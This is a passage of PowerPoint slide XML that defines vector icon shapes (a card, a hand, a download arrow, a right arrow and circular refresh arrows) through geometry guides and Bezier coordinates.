                    <a:pt x="26" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="89"/>
                    <a:pt x="22" y="82"/>
                    <a:pt x="2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49BB751-A2E5-4A6A-91B4-BFED7225E6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288">
              <a:off x="174628" y="3682300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8DA0A8A8-351C-449A-A9BC-CB0D375BA8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092998">
              <a:off x="4595267" y="1827148"/>
              <a:ext cx="750888" cy="511175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 199 w 200"/>
                <a:gd name="T1" fmla="*/ 32 h 136"/>
                <a:gd name="T2" fmla="*/ 199 w 200"/>
                <a:gd name="T3" fmla="*/ 31 h 136"/>
                <a:gd name="T4" fmla="*/ 0 w 200"/>
                <a:gd name="T5" fmla="*/ 31 h 136"/>
                <a:gd name="T6" fmla="*/ 0 w 200"/>
                <a:gd name="T7" fmla="*/ 18 h 136"/>
                <a:gd name="T8" fmla="*/ 18 w 200"/>
                <a:gd name="T9" fmla="*/ 0 h 136"/>
                <a:gd name="T10" fmla="*/ 181 w 200"/>
                <a:gd name="T11" fmla="*/ 0 h 136"/>
                <a:gd name="T12" fmla="*/ 199 w 200"/>
                <a:gd name="T13" fmla="*/ 18 h 136"/>
                <a:gd name="T14" fmla="*/ 199 w 200"/>
                <a:gd name="T15" fmla="*/ 32 h 136"/>
                <a:gd name="T16" fmla="*/ 200 w 200"/>
                <a:gd name="T17" fmla="*/ 64 h 136"/>
                <a:gd name="T18" fmla="*/ 200 w 200"/>
                <a:gd name="T19" fmla="*/ 119 h 136"/>
                <a:gd name="T20" fmla="*/ 181 w 200"/>
                <a:gd name="T21" fmla="*/ 136 h 136"/>
                <a:gd name="T22" fmla="*/ 18 w 200"/>
                <a:gd name="T23" fmla="*/ 136 h 136"/>
                <a:gd name="T24" fmla="*/ 0 w 200"/>
                <a:gd name="T25" fmla="*/ 119 h 136"/>
                <a:gd name="T26" fmla="*/ 0 w 200"/>
                <a:gd name="T27" fmla="*/ 64 h 136"/>
                <a:gd name="T28" fmla="*/ 200 w 200"/>
                <a:gd name="T29" fmla="*/ 64 h 136"/>
                <a:gd name="T30" fmla="*/ 76 w 200"/>
                <a:gd name="T31" fmla="*/ 88 h 136"/>
                <a:gd name="T32" fmla="*/ 48 w 200"/>
                <a:gd name="T33" fmla="*/ 88 h 136"/>
                <a:gd name="T34" fmla="*/ 48 w 200"/>
                <a:gd name="T35" fmla="*/ 100 h 136"/>
                <a:gd name="T36" fmla="*/ 76 w 200"/>
                <a:gd name="T37" fmla="*/ 100 h 136"/>
                <a:gd name="T38" fmla="*/ 76 w 200"/>
                <a:gd name="T39" fmla="*/ 88 h 136"/>
                <a:gd name="T40" fmla="*/ 112 w 200"/>
                <a:gd name="T41" fmla="*/ 88 h 136"/>
                <a:gd name="T42" fmla="*/ 88 w 200"/>
                <a:gd name="T43" fmla="*/ 88 h 136"/>
                <a:gd name="T44" fmla="*/ 88 w 200"/>
                <a:gd name="T45" fmla="*/ 100 h 136"/>
                <a:gd name="T46" fmla="*/ 112 w 200"/>
                <a:gd name="T47" fmla="*/ 100 h 136"/>
                <a:gd name="T48" fmla="*/ 112 w 200"/>
                <a:gd name="T49" fmla="*/ 88 h 136"/>
                <a:gd name="T50" fmla="*/ 152 w 200"/>
                <a:gd name="T51" fmla="*/ 88 h 136"/>
                <a:gd name="T52" fmla="*/ 120 w 200"/>
                <a:gd name="T53" fmla="*/ 88 h 136"/>
                <a:gd name="T54" fmla="*/ 120 w 200"/>
                <a:gd name="T55" fmla="*/ 100 h 136"/>
                <a:gd name="T56" fmla="*/ 152 w 200"/>
                <a:gd name="T57" fmla="*/ 100 h 136"/>
                <a:gd name="T58" fmla="*/ 152 w 200"/>
                <a:gd name="T59" fmla="*/ 88 h 136"/>
                <a:gd name="T60" fmla="*/ 12 w 200"/>
                <a:gd name="T61" fmla="*/ 119 h 136"/>
                <a:gd name="T62" fmla="*/ 152 w 200"/>
                <a:gd name="T63" fmla="*/ 119 h 136"/>
                <a:gd name="T64" fmla="*/ 152 w 200"/>
                <a:gd name="T65" fmla="*/ 108 h 136"/>
                <a:gd name="T66" fmla="*/ 12 w 200"/>
                <a:gd name="T67" fmla="*/ 108 h 136"/>
                <a:gd name="T68" fmla="*/ 12 w 200"/>
                <a:gd name="T69" fmla="*/ 119 h 136"/>
                <a:gd name="T70" fmla="*/ 12 w 200"/>
                <a:gd name="T71" fmla="*/ 100 h 136"/>
                <a:gd name="T72" fmla="*/ 40 w 200"/>
                <a:gd name="T73" fmla="*/ 100 h 136"/>
                <a:gd name="T74" fmla="*/ 40 w 200"/>
                <a:gd name="T75" fmla="*/ 88 h 136"/>
                <a:gd name="T76" fmla="*/ 12 w 200"/>
                <a:gd name="T77" fmla="*/ 88 h 136"/>
                <a:gd name="T78" fmla="*/ 12 w 200"/>
                <a:gd name="T7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36">
                  <a:moveTo>
                    <a:pt x="199" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="31"/>
                    <a:pt x="199" y="31"/>
                    <a:pt x="199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91" y="0"/>
                    <a:pt x="199" y="8"/>
                    <a:pt x="199" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="32"/>
                    <a:pt x="199" y="32"/>
                    <a:pt x="199" y="32"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="200" y="64"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="119"/>
                    <a:pt x="200" y="119"/>
                    <a:pt x="200" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="129"/>
                    <a:pt x="191" y="136"/>
                    <a:pt x="181" y="136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8" y="136"/>
                    <a:pt x="0" y="129"/>
                    <a:pt x="0" y="119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200" y="64"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="76" y="88"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="88"/>
                    <a:pt x="48" y="88"/>
                    <a:pt x="48" y="88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76" y="100"/>
                    <a:pt x="76" y="100"/>
                    <a:pt x="76" y="100"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="88"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="112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112" y="100"/>
                    <a:pt x="112" y="100"/>
                    <a:pt x="112" y="100"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="112" y="88"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="152" y="88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52" y="100"/>
                    <a:pt x="152" y="100"/>
                    <a:pt x="152" y="100"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="152" y="88"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="12" y="119"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="119"/>
                    <a:pt x="152" y="119"/>
                    <a:pt x="152" y="119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119"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="12" y="100"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="100"/>
                    <a:pt x="40" y="100"/>
                    <a:pt x="40" y="10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12" y="88"/>
                    <a:pt x="12" y="88"/>
                    <a:pt x="12" y="88"/>
                  </a:cubicBez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19DAE37E-409C-46D8-909E-E7DD616F78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921052" y="2263598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E38D927-C379-46C6-945B-B82BFB4FFACE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="3939485">
              <a:off x="7392355" y="1719266"/>
              <a:ext cx="544512" cy="749300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82BC9B8D-125B-4F3F-8260-78D531B18C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5400000">
              <a:off x="3167444" y="4702772"/>
              <a:ext cx="725487" cy="766763"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 32 w 193"/>
                <a:gd name="T1" fmla="*/ 24 h 204"/>
                <a:gd name="T2" fmla="*/ 73 w 193"/>
                <a:gd name="T3" fmla="*/ 81 h 204"/>
                <a:gd name="T4" fmla="*/ 68 w 193"/>
                <a:gd name="T5" fmla="*/ 60 h 204"/>
                <a:gd name="T6" fmla="*/ 75 w 193"/>
                <a:gd name="T7" fmla="*/ 47 h 204"/>
                <a:gd name="T8" fmla="*/ 92 w 193"/>
                <a:gd name="T9" fmla="*/ 58 h 204"/>
                <a:gd name="T10" fmla="*/ 99 w 193"/>
                <a:gd name="T11" fmla="*/ 56 h 204"/>
                <a:gd name="T12" fmla="*/ 100 w 193"/>
                <a:gd name="T13" fmla="*/ 42 h 204"/>
                <a:gd name="T14" fmla="*/ 117 w 193"/>
                <a:gd name="T15" fmla="*/ 44 h 204"/>
                <a:gd name="T16" fmla="*/ 119 w 193"/>
                <a:gd name="T17" fmla="*/ 48 h 204"/>
                <a:gd name="T18" fmla="*/ 125 w 193"/>
                <a:gd name="T19" fmla="*/ 57 h 204"/>
                <a:gd name="T20" fmla="*/ 126 w 193"/>
                <a:gd name="T21" fmla="*/ 53 h 204"/>
                <a:gd name="T22" fmla="*/ 137 w 193"/>
                <a:gd name="T23" fmla="*/ 47 h 204"/>
                <a:gd name="T24" fmla="*/ 161 w 193"/>
                <a:gd name="T25" fmla="*/ 132 h 204"/>
                <a:gd name="T26" fmla="*/ 121 w 193"/>
                <a:gd name="T27" fmla="*/ 185 h 204"/>
                <a:gd name="T28" fmla="*/ 76 w 193"/>
                <a:gd name="T29" fmla="*/ 151 h 204"/>
                <a:gd name="T30" fmla="*/ 21 w 193"/>
                <a:gd name="T31" fmla="*/ 131 h 204"/>
                <a:gd name="T32" fmla="*/ 34 w 193"/>
                <a:gd name="T33" fmla="*/ 122 h 204"/>
                <a:gd name="T34" fmla="*/ 64 w 193"/>
                <a:gd name="T35" fmla="*/ 125 h 204"/>
                <a:gd name="T36" fmla="*/ 17 w 193"/>
                <a:gd name="T37" fmla="*/ 33 h 204"/>
                <a:gd name="T38" fmla="*/ 20 w 193"/>
                <a:gd name="T39" fmla="*/ 19 h 204"/>
                <a:gd name="T40" fmla="*/ 12 w 193"/>
                <a:gd name="T41" fmla="*/ 7 h 204"/>
                <a:gd name="T42" fmla="*/ 6 w 193"/>
                <a:gd name="T43" fmla="*/ 40 h 204"/>
                <a:gd name="T44" fmla="*/ 45 w 193"/>
                <a:gd name="T45" fmla="*/ 109 h 204"/>
                <a:gd name="T46" fmla="*/ 19 w 193"/>
                <a:gd name="T47" fmla="*/ 111 h 204"/>
                <a:gd name="T48" fmla="*/ 27 w 193"/>
                <a:gd name="T49" fmla="*/ 157 h 204"/>
                <a:gd name="T50" fmla="*/ 99 w 193"/>
                <a:gd name="T51" fmla="*/ 175 h 204"/>
                <a:gd name="T52" fmla="*/ 116 w 193"/>
                <a:gd name="T53" fmla="*/ 204 h 204"/>
                <a:gd name="T54" fmla="*/ 181 w 193"/>
                <a:gd name="T55" fmla="*/ 166 h 204"/>
                <a:gd name="T56" fmla="*/ 186 w 193"/>
                <a:gd name="T57" fmla="*/ 147 h 204"/>
                <a:gd name="T58" fmla="*/ 161 w 193"/>
                <a:gd name="T59" fmla="*/ 61 h 204"/>
                <a:gd name="T60" fmla="*/ 161 w 193"/>
                <a:gd name="T61" fmla="*/ 60 h 204"/>
                <a:gd name="T62" fmla="*/ 155 w 193"/>
                <a:gd name="T63" fmla="*/ 44 h 204"/>
                <a:gd name="T64" fmla="*/ 128 w 193"/>
                <a:gd name="T65" fmla="*/ 33 h 204"/>
                <a:gd name="T66" fmla="*/ 93 w 193"/>
                <a:gd name="T67" fmla="*/ 30 h 204"/>
                <a:gd name="T68" fmla="*/ 68 w 193"/>
                <a:gd name="T69" fmla="*/ 35 h 204"/>
                <a:gd name="T70" fmla="*/ 59 w 193"/>
                <a:gd name="T71" fmla="*/ 41 h 204"/>
                <a:gd name="T72" fmla="*/ 44 w 193"/>
                <a:gd name="T73" fmla="*/ 16 h 204"/>
                <a:gd name="T74" fmla="*/ 13 w 193"/>
                <a:gd name="T75" fmla="*/ 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204">
                  <a:moveTo>
                    <a:pt x="20" y="19"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="16"/>
                    <a:pt x="29" y="19"/>
                    <a:pt x="32" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="24"/>
                    <a:pt x="65" y="79"/>
                    <a:pt x="65" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="83"/>
                    <a:pt x="71" y="82"/>
                    <a:pt x="73" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="79"/>
                    <a:pt x="77" y="75"/>
                    <a:pt x="74" y="69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5" y="56"/>
                    <a:pt x="68" y="52"/>
                    <a:pt x="73" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="48"/>
                    <a:pt x="74" y="47"/>
                    <a:pt x="75" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="45"/>
                    <a:pt x="83" y="44"/>
                    <a:pt x="86" y="4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4" y="61"/>
                    <a:pt x="96" y="61"/>
                    <a:pt x="97" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="60"/>
                    <a:pt x="99" y="56"/>
                    <a:pt x="99" y="56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6" y="47"/>
                    <a:pt x="97" y="44"/>
                    <a:pt x="100" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="42"/>
                    <a:pt x="102" y="41"/>
                    <a:pt x="104" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="39"/>
                    <a:pt x="115" y="38"/>
                    <a:pt x="117" y="44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21" y="60"/>
                    <a:pt x="124" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="58"/>
                    <a:pt x="125" y="58"/>
                    <a:pt x="125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0"/>
                    <a:pt x="127" y="49"/>
                    <a:pt x="128" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="47"/>
                    <a:pt x="134" y="47"/>
                    <a:pt x="137" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="47"/>
                    <a:pt x="144" y="53"/>
                    <a:pt x="147" y="64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174" y="155"/>
                    <a:pt x="174" y="155"/>
                    <a:pt x="174" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="185"/>
                    <a:pt x="121" y="185"/>
                    <a:pt x="121" y="18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2"/>
                    <a:pt x="94" y="162"/>
                    <a:pt x="76" y="151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24" y="142"/>
                    <a:pt x="20" y="136"/>
                    <a:pt x="21" y="131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="127"/>
                    <a:pt x="24" y="125"/>
                    <a:pt x="26" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="122"/>
                    <a:pt x="31" y="121"/>
                    <a:pt x="34" y="122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2" y="125"/>
                    <a:pt x="63" y="125"/>
                    <a:pt x="64" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="123"/>
                    <a:pt x="64" y="113"/>
                    <a:pt x="52" y="9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4" y="28"/>
                    <a:pt x="15" y="22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2" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="11"/>
                    <a:pt x="3" y="16"/>
                    <a:pt x="1" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="29"/>
                    <a:pt x="3" y="34"/>
                    <a:pt x="6" y="40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3" y="102"/>
                    <a:pt x="44" y="106"/>
                    <a:pt x="4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0" y="107"/>
                    <a:pt x="24" y="108"/>
                    <a:pt x="19" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="115"/>
                    <a:pt x="9" y="121"/>
                    <a:pt x="7" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="142"/>
                    <a:pt x="14" y="154"/>
                    <a:pt x="27" y="157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82" y="171"/>
                    <a:pt x="92" y="174"/>
                    <a:pt x="99" y="175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93" y="159"/>
                    <a:pt x="193" y="159"/>
                    <a:pt x="193" y="159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9" y="53"/>
                    <a:pt x="157" y="48"/>
                    <a:pt x="155" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="35"/>
                    <a:pt x="142" y="33"/>
                    <a:pt x="137" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="33"/>
                    <a:pt x="131" y="33"/>
                    <a:pt x="128" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="27"/>
                    <a:pt x="113" y="23"/>
                    <a:pt x="99" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="28"/>
                    <a:pt x="95" y="29"/>
                    <a:pt x="93" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="31"/>
                    <a:pt x="90" y="32"/>
                    <a:pt x="89" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="30"/>
                    <a:pt x="76" y="30"/>
                    <a:pt x="68" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="35"/>
                    <a:pt x="64" y="37"/>
                    <a:pt x="63" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="39"/>
                    <a:pt x="60" y="40"/>
                    <a:pt x="59" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="30"/>
                    <a:pt x="46" y="19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7" y="5"/>
                    <a:pt x="25" y="0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3776440E-34BE-4BC2-BEBB-B1DC07396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136281">
              <a:off x="2834209" y="6251000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C12DF46F-9788-4A28-AE32-BFFF95B089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7800658">
              <a:off x="6209502" y="3207147"/>
              <a:ext cx="692150" cy="752475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 132 w 184"/>
                <a:gd name="T1" fmla="*/ 44 h 200"/>
                <a:gd name="T2" fmla="*/ 52 w 184"/>
                <a:gd name="T3" fmla="*/ 44 h 200"/>
                <a:gd name="T4" fmla="*/ 52 w 184"/>
                <a:gd name="T5" fmla="*/ 25 h 200"/>
                <a:gd name="T6" fmla="*/ 132 w 184"/>
                <a:gd name="T7" fmla="*/ 25 h 200"/>
                <a:gd name="T8" fmla="*/ 132 w 184"/>
                <a:gd name="T9" fmla="*/ 44 h 200"/>
                <a:gd name="T10" fmla="*/ 52 w 184"/>
                <a:gd name="T11" fmla="*/ 0 h 200"/>
                <a:gd name="T12" fmla="*/ 132 w 184"/>
                <a:gd name="T13" fmla="*/ 0 h 200"/>
                <a:gd name="T14" fmla="*/ 132 w 184"/>
                <a:gd name="T15" fmla="*/ 16 h 200"/>
                <a:gd name="T16" fmla="*/ 52 w 184"/>
                <a:gd name="T17" fmla="*/ 16 h 200"/>
                <a:gd name="T18" fmla="*/ 52 w 184"/>
                <a:gd name="T19" fmla="*/ 0 h 200"/>
                <a:gd name="T20" fmla="*/ 52 w 184"/>
                <a:gd name="T21" fmla="*/ 52 h 200"/>
                <a:gd name="T22" fmla="*/ 132 w 184"/>
                <a:gd name="T23" fmla="*/ 52 h 200"/>
                <a:gd name="T24" fmla="*/ 132 w 184"/>
                <a:gd name="T25" fmla="*/ 85 h 200"/>
                <a:gd name="T26" fmla="*/ 184 w 184"/>
                <a:gd name="T27" fmla="*/ 85 h 200"/>
                <a:gd name="T28" fmla="*/ 92 w 184"/>
                <a:gd name="T29" fmla="*/ 162 h 200"/>
                <a:gd name="T30" fmla="*/ 0 w 184"/>
                <a:gd name="T31" fmla="*/ 85 h 200"/>
                <a:gd name="T32" fmla="*/ 52 w 184"/>
                <a:gd name="T33" fmla="*/ 85 h 200"/>
                <a:gd name="T34" fmla="*/ 52 w 184"/>
                <a:gd name="T35" fmla="*/ 52 h 200"/>
                <a:gd name="T36" fmla="*/ 9 w 184"/>
                <a:gd name="T37" fmla="*/ 168 h 200"/>
                <a:gd name="T38" fmla="*/ 174 w 184"/>
                <a:gd name="T39" fmla="*/ 168 h 200"/>
                <a:gd name="T40" fmla="*/ 183 w 184"/>
                <a:gd name="T41" fmla="*/ 177 h 200"/>
                <a:gd name="T42" fmla="*/ 183 w 184"/>
                <a:gd name="T43" fmla="*/ 191 h 200"/>
                <a:gd name="T44" fmla="*/ 174 w 184"/>
                <a:gd name="T45" fmla="*/ 200 h 200"/>
                <a:gd name="T46" fmla="*/ 9 w 184"/>
                <a:gd name="T47" fmla="*/ 200 h 200"/>
                <a:gd name="T48" fmla="*/ 0 w 184"/>
                <a:gd name="T49" fmla="*/ 191 h 200"/>
                <a:gd name="T50" fmla="*/ 0 w 184"/>
                <a:gd name="T51" fmla="*/ 177 h 200"/>
                <a:gd name="T52" fmla="*/ 9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2" y="25"/>
                    <a:pt x="132" y="25"/>
                    <a:pt x="132" y="25"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="132" y="44"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="52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52" y="16"/>
                    <a:pt x="52" y="16"/>
                    <a:pt x="52" y="16"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="52" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="52" y="52"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="52"/>
                    <a:pt x="132" y="52"/>
                    <a:pt x="132" y="52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52" y="52"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="9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179" y="168"/>
                    <a:pt x="183" y="172"/>
                    <a:pt x="183" y="177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4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2"/>
                    <a:pt x="4" y="168"/>
                    <a:pt x="9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69E3C3A8-550C-4CBB-B1A1-FABAC12F361D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285330" y="5016889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DB4D04B2-22AE-41AF-B92B-EFC03DE495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5165" y="-83383"/>
              <a:ext cx="752475" cy="684213"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 218 w 474"/>
                <a:gd name="T1" fmla="*/ 0 h 431"/>
                <a:gd name="T2" fmla="*/ 474 w 474"/>
                <a:gd name="T3" fmla="*/ 215 h 431"/>
                <a:gd name="T4" fmla="*/ 218 w 474"/>
                <a:gd name="T5" fmla="*/ 431 h 431"/>
                <a:gd name="T6" fmla="*/ 218 w 474"/>
                <a:gd name="T7" fmla="*/ 303 h 431"/>
                <a:gd name="T8" fmla="*/ 0 w 474"/>
                <a:gd name="T9" fmla="*/ 303 h 431"/>
                <a:gd name="T10" fmla="*/ 0 w 474"/>
                <a:gd name="T11" fmla="*/ 130 h 431"/>
                <a:gd name="T12" fmla="*/ 218 w 474"/>
                <a:gd name="T13" fmla="*/ 130 h 431"/>
                <a:gd name="T14" fmla="*/ 218 w 474"/>
                <a:gd name="T15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4" h="431">
                  <a:moveTo>
                    <a:pt x="218" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="474" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218" y="431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218" y="130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093B5A45-E6FE-461D-8A7E-7D67DBB91A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5208" y="703944"/>
              <a:ext cx="818640" cy="820397"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 99 w 197"/>
                <a:gd name="T1" fmla="*/ 197 h 197"/>
                <a:gd name="T2" fmla="*/ 22 w 197"/>
                <a:gd name="T3" fmla="*/ 160 h 197"/>
                <a:gd name="T4" fmla="*/ 0 w 197"/>
                <a:gd name="T5" fmla="*/ 174 h 197"/>
                <a:gd name="T6" fmla="*/ 5 w 197"/>
                <a:gd name="T7" fmla="*/ 92 h 197"/>
                <a:gd name="T8" fmla="*/ 81 w 197"/>
                <a:gd name="T9" fmla="*/ 123 h 197"/>
                <a:gd name="T10" fmla="*/ 56 w 197"/>
                <a:gd name="T11" fmla="*/ 138 h 197"/>
                <a:gd name="T12" fmla="*/ 99 w 197"/>
                <a:gd name="T13" fmla="*/ 157 h 197"/>
                <a:gd name="T14" fmla="*/ 157 w 197"/>
                <a:gd name="T15" fmla="*/ 99 h 197"/>
                <a:gd name="T16" fmla="*/ 99 w 197"/>
                <a:gd name="T17" fmla="*/ 40 h 197"/>
                <a:gd name="T18" fmla="*/ 46 w 197"/>
                <a:gd name="T19" fmla="*/ 74 h 197"/>
                <a:gd name="T20" fmla="*/ 10 w 197"/>
                <a:gd name="T21" fmla="*/ 57 h 197"/>
                <a:gd name="T22" fmla="*/ 99 w 197"/>
                <a:gd name="T23" fmla="*/ 0 h 197"/>
                <a:gd name="T24" fmla="*/ 197 w 197"/>
                <a:gd name="T25" fmla="*/ 99 h 197"/>
                <a:gd name="T26" fmla="*/ 99 w 197"/>
                <a:gd name="T2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197">
                  <a:moveTo>
                    <a:pt x="99" y="197"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="197"/>
                    <a:pt x="40" y="183"/>
                    <a:pt x="22" y="16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67" y="150"/>
                    <a:pt x="82" y="157"/>
                    <a:pt x="99" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="157"/>
                    <a:pt x="157" y="131"/>
                    <a:pt x="157" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="66"/>
                    <a:pt x="131" y="40"/>
                    <a:pt x="99" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="40"/>
                    <a:pt x="55" y="54"/>
                    <a:pt x="46" y="7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25" y="24"/>
                    <a:pt x="60" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="0"/>
                    <a:pt x="197" y="44"/>
                    <a:pt x="197" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="153"/>
                    <a:pt x="153" y="197"/>
                    <a:pt x="99" y="1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EFA66DF7-6121-419D-8F72-A25096AF33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44726" y="150070"/>
              <a:ext cx="736600" cy="744538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 196"/>
                <a:gd name="T1" fmla="*/ 73 h 198"/>
                <a:gd name="T2" fmla="*/ 134 w 196"/>
                <a:gd name="T3" fmla="*/ 56 h 198"/>
                <a:gd name="T4" fmla="*/ 95 w 196"/>
                <a:gd name="T5" fmla="*/ 40 h 198"/>
                <a:gd name="T6" fmla="*/ 39 w 196"/>
                <a:gd name="T7" fmla="*/ 83 h 198"/>
                <a:gd name="T8" fmla="*/ 0 w 196"/>
                <a:gd name="T9" fmla="*/ 73 h 198"/>
                <a:gd name="T10" fmla="*/ 94 w 196"/>
                <a:gd name="T11" fmla="*/ 0 h 198"/>
                <a:gd name="T12" fmla="*/ 163 w 196"/>
                <a:gd name="T13" fmla="*/ 29 h 198"/>
                <a:gd name="T14" fmla="*/ 182 w 196"/>
                <a:gd name="T15" fmla="*/ 13 h 198"/>
                <a:gd name="T16" fmla="*/ 196 w 196"/>
                <a:gd name="T17" fmla="*/ 95 h 198"/>
                <a:gd name="T18" fmla="*/ 115 w 196"/>
                <a:gd name="T19" fmla="*/ 73 h 198"/>
                <a:gd name="T20" fmla="*/ 61 w 196"/>
                <a:gd name="T21" fmla="*/ 142 h 198"/>
                <a:gd name="T22" fmla="*/ 101 w 196"/>
                <a:gd name="T23" fmla="*/ 158 h 198"/>
                <a:gd name="T24" fmla="*/ 157 w 196"/>
                <a:gd name="T25" fmla="*/ 115 h 198"/>
                <a:gd name="T26" fmla="*/ 196 w 196"/>
                <a:gd name="T27" fmla="*/ 125 h 198"/>
                <a:gd name="T28" fmla="*/ 101 w 196"/>
                <a:gd name="T29" fmla="*/ 198 h 198"/>
                <a:gd name="T30" fmla="*/ 32 w 196"/>
                <a:gd name="T31" fmla="*/ 169 h 198"/>
                <a:gd name="T32" fmla="*/ 14 w 196"/>
                <a:gd name="T33" fmla="*/ 185 h 198"/>
                <a:gd name="T34" fmla="*/ 0 w 196"/>
                <a:gd name="T35" fmla="*/ 103 h 198"/>
                <a:gd name="T36" fmla="*/ 81 w 196"/>
                <a:gd name="T37" fmla="*/ 125 h 198"/>
                <a:gd name="T38" fmla="*/ 61 w 196"/>
                <a:gd name="T39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198">
                  <a:moveTo>
                    <a:pt x="115" y="73"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="56"/>
                    <a:pt x="134" y="56"/>
                    <a:pt x="134" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="48"/>
